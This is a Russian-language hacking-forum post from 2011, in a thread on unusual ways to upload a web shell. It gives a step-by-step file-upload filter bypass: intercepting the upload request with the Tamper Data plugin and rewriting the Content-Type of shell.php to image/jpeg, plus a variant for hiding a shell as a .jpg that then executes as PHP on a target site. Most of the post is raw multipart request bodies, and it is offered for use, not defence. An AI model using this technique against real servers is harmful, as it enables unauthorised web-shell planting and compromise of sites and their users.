Тема: Не стандартные способы заливки шелла
Показать сообщение отдельно

  #54  
Старый 15.12.2011, 01:28
BLurpi^_^
Участник форума
Регистрация: 09.02.2011
Сообщений: 218
С нами: 8029046

Репутация: 9
По умолчанию
Вот еще один способ:

Например плагином Tamper Data для Mozilla Firefox.

Запускаешь перехват данных и пытаешься залить шелл, после чего жмешь вмешаться.

В ответ придет, что то вроде:

Цитата:
Сообщение от None  
Код:
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n
Content-Type:
application/octet-stream
\r\n\r\n\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n
-----------------------------41184676334--\r\n
Меняешь на:

Цитата:
Сообщение от None  
Код:
------------------------------41184676334\r\n
Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n
Content-Type:
image/jpeg
\r\n\r\n\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n
-----------------------------41184676334--\r\n
И отправляешь.

/showpost.php?p=2344055&postcount=4

Так же можно воспользоваться этим, но только наоборот для сокрытия шелла, мы начинаем закачивать шелл на сайт(в формате .jpg)и после начала перехватываем запрос тампер датой и что то вроде:

Цитата:
Сообщение от None  
------------------------------41184676334\r\n
Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n
Content-Type:
image/jpeg
\r\n\r\n\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n
-----------------------------41184676334--\r\n[
меняем на:

Цитата:
Сообщение от None  
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n
Content-Type:
application/octet-stream
\r\n\r\n\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n
-----------------------------41184676334--\r\n
и шелл в формате http://site.gov/images/logo.jpg исполняется как пхп файл в браузере

Только не начинайте гнобить...и ТСа тоже не гнобите, он наоборот молодец, а эту тему можно развивать и каждый будет вносить сюда свою лепту, частичку своего опыта и в скором будущем мы(сообщество античата)будем располагать огромными знаниями в этой области!
 
Ответить с цитированием